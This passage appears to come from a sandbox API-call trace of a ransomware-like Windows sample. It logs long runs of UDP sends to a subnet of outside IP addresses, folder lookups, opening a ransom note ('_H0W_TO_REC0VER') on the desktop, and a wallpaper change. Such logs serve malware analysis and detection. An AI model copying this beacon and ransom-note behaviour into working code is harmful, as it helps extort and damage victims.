sin_port=0x1af5, sin_addr="167.114.195.175"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.155] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.176"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.155] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.177"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.155] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.178"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.155] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.179"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.156] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.180"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.156] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.181"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.156] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.182"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.156] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.183"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.156] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.184"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.156] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.185"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.156] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.186"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.157] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.187"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.157] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.188"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.157] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.189"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.157] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.190"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.157] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.191"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.157] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.192"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.157] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.193"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.158] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.194"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.158] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.195"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.158] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.196"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.158] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.197"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.158] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.198"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.158] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.199"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.158] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.200"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.158] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.201"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.202"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.203"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.204"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.205"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.206"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.207"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.208"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.209"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.210"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.211"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.159] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.212"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.160] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.213"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.160] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.214"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.160] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.215"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.160] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.216"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.160] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.217"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.160] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.218"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.160] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.219"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.201] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x12ef68 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 0x0 [0096.202] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x12ed68 | out: pszPath="C:\\Users\\EEBsYm5\\Documents") returned 0x0 [0096.203] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0xffffffff, dwFlags=0x0, pszPath=0x12eb68 | out: pszPath="C:\\Users\\Default\\Desktop") returned 0x0 [0096.302] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\EEBsYm5\\Desktop\\(_H0W_TO_REC0VER_HePV.html", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0100.671] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x12ef78, csidl=39, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Pictures") returned 1 [0100.673] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x28a300, fWinIni=0x3 | out: pvParam=0x28a300) returned 0 [0101.418] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0101.418] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0101.418] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x12f1b0 | out: phModule=0x12f1b0) returned 0 [0101.418] ExitProcess (uExitCode=0x0) [0101.493] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0xa54 [0045.392] GetLastError () returned 0x0 [0045.392] SetLastError (dwErrCode=0x0) [0045.392] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.392] GetLastError () returned 0x57 [0045.392] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0045.392] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.392] GetLastError () returned 0x57 [0045.393] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0045.393] GetCurrentThreadId () returned 0xa54 [0045.393] GetCurrentThreadId () returned 0xa54 [0045.393] RtlWakeConditionVariable (in: ConditionVariable=0x29f164 | out: ConditionVariable=0x29f164) [0045.436] GetCurrentThreadId () returned 0xa54 [0045.436] GetCurrentThreadId () returned 0xa54 [0045.437] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x173fb38 | out: lpWSAData=0x173fb38) returned 0 [0045.440] socket (af=2, type=2, protocol=0) returned 0xe0 [0045.443] htons (hostshort=0x1af5) returned 0xf51a [0045.443] inet_addr (cp="167.114.194.225") returned 0xe1c272a7 [0045.443] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.225"), tolen=16 | out: buf=0x282960*) returned 49 [0045.444] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.226"), tolen=16 | out: buf=0x282960*) returned 49 [0045.444] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.227"), tolen=16 | out: buf=0x282960*) returned 49 [0045.444] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.228"), tolen=16 | out: buf=0x282960*) returned 49 [0045.444] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.229"), tolen=16 | out: buf=0x282960*) returned 49 [0045.445] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.230"), tolen=16 | out: buf=0x282960*) returned 49 [0045.445] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.231"), tolen=16 | out: buf=0x282960*) returned 49 [0045.445] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.232"), tolen=16 | out: buf=0x282960*) returned 49 [0045.445] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.233"), tolen=16 | out: buf=0x282960*) returned 49 [0045.446] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.234"), tolen=16 | out: buf=0x282960*) returned 49 [0045.446] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.235"), tolen=16 | out: buf=0x282960*) returned 49 [0045.446] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.236"), tolen=16 | out: buf=0x282960*) returned 49 [0045.446] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.237"), tolen=16 | out: buf=0x282960*) returned 49 [0045.446] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.238"), tolen=16 | out: buf=0x282960*) returned 49 [0045.447] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.239"), tolen=16 | out: buf=0x282960*) returned 49 [0045.447] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.240"), tolen=16 | out: buf=0x282960*) returned 49 [0045.447] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.241"), tolen=16 | out: buf=0x282960*) returned 49 [0045.447] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.242"), tolen=16 | out: buf=0x282960*) returned 49 [0045.447] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.243"), tolen=16 | out: buf=0x282960*) returned 49 [0045.448] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.244"), tolen=16 | out: buf=0x282960*) returned 49 [0045.448] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.245"), tolen=16 | out: buf=0x282960*) returned 49 [0045.448] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.246"), tolen=16 | out: buf=0x282960*) returned 49 [0045.448] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.247"), tolen=16 | out: buf=0x282960*) returned 49 [0045.448] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.248"), tolen=16 | out: buf=0x282960*) returned 49 [0045.449] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.249"), tolen=16 | out: buf=0x282960*) returned 49 [0045.449] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.250"), tolen=16 | out: buf=0x282960*) returned 49 [0045.449] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.251"), tolen=16 | out: buf=0x282960*) returned 49 [0045.449] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.252"), tolen=16 | out: buf=0x282960*) returned 49 [0045.450] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.253"), tolen=16 | out: buf=0x282960*) returned 49 [0045.450] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.254"), tolen=16 | out: buf=0x282960*) returned 49 [0045.450] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.1"), tolen=16 | out: buf=0x282960*) returned 49 [0045.450] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.2"), tolen=16 | out: buf=0x282960*) returned 49 [0045.450] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.3"), tolen=16 | out: buf=0x282960*) returned 49 [0045.451] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.4"), tolen=16 | out: buf=0x282960*) returned 49 [0045.451] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.5"), tolen=16 | out: buf=0x282960*) returned 49 [0045.451] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.6"), tolen=16 | out: buf=0x282960*) returned 49 [0045.451] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.7"), tolen=16 | out: buf=0x282960*) returned 49 [0045.452] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.8"), tolen=16 | out: buf=0x282960*) returned 49 [0045.452] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.9"), tolen=16 | out: buf=0x282960*) returned 49 [0045.452] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.10"), tolen=16 | out: buf=0x282960*) returned 49 [0045.456] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.11"), tolen=16 | out: buf=0x282960*) returned 49 [0045.456] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.12"), tolen=16 | out: buf=0x282960*) returned 49 [0045.456] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.13"), tolen=16 | out: buf=0x282960*) returned 49 [0045.456] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.14"), tolen=16 | out: buf=0x282960*) returned 49 [0045.457] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.15"), tolen=16 | out: buf=0x282960*) returned 49 [0045.457] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.16"), tolen=16 | out: buf=0x282960*) returned 49 [0045.457] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.17"), tolen=16 | out: buf=0x282960*) returned 49 [0045.457] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.18"), tolen=16 | out: buf=0x282960*) returned 49 [0045.458] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.19"), tolen=16 | out: buf=0x282960*) returned 49 [0045.458] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.20"), tolen=16 | out: buf=0x282960*) returned 49 [0045.458] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.21"), tolen=16 | out: buf=0x282960*) returned 49 [0045.458] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.22"), tolen=16 | out: buf=0x282960*) returned 49 [0045.458] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.23"), tolen=16 | out: buf=0x282960*) returned 49 [0045.459] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.24"), tolen=16 | out: buf=0x282960*) returned 49 [0045.459] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.25"), tolen=16 | out: buf=0x282960*) returned 49 [0045.459] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.26"), tolen=16 | out: buf=0x282960*) returned 49 [0045.459] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.27"), tolen=16 | out: buf=0x282960*) returned 49 [0045.460] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.28"), tolen=16 | out: buf=0x282960*) returned 49 [0045.460] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.29"), tolen=16 | out: buf=0x282960*) returned 49 [0045.460] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.30"), tolen=16 | out: buf=0x282960*) returned 49 [0045.460] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.31"), tolen=16 | out: buf=0x282960*) returned 49 [0045.460] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.32"), tolen=16 | out: buf=0x282960*) returned 49 [0045.461] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.33"), tolen=16 | out: buf=0x282960*) returned 49 [0045.461] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.34"), tolen=16 | out: buf=0x282960*) returned 49 [0045.461] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.35"), tolen=16 | out: buf=0x282960*) returned 49 [0045.461] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.36"), tolen=16 | out: buf=0x282960*) returned 49 [0045.461] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.37"), tolen=16 | out: buf=0x282960*) returned 49 [0045.462] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.38"), tolen=16 | out: buf=0x282960*) returned 49 [0045.462] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.39"), tolen=16 | out: buf=0x282960*) returned 49 [0045.462] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.40"), tolen=16 | out: buf=0x282960*) returned 49 [0045.462] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.41"), tolen=16 | out: buf=0x282960*) returned 49 [0045.462] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.42"), tolen=16 | out: buf=0x282960*) returned 49 [0045.462] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.43"), tolen=16 | out: buf=0x282960*) returned 49 [0045.463] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.44"), tolen=16 | out: buf=0x282960*) returned 49 [0045.463] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.45"), tolen=16 | out: buf=0x282960*) returned 49 [0045.463] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.46"), tolen=16 | out: buf=0x282960*) returned 49 [0045.463] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.47"), tolen=16 | out: buf=0x282960*) returned 49 [0045.463] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.48"), tolen=16 | out: buf=0x282960*) returned 49 [0045.464] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.49"), tolen=16 | out: buf=0x282960*) returned 49 [0045.464] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.50"), tolen=16 | out: buf=0x282960*) returned 49 [0045.464] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.51"), tolen=16 | out: buf=0x282960*) returned 49 [0045.464] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.52"), tolen=16 | out: buf=0x282960*) returned 49 [0045.465] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.53"), tolen=16 | out: buf=0x282960*) returned 49 [0045.465] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.54"), tolen=16 | out: buf=0x282960*) returned 49 [0045.465] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.55"), tolen=16 | out: 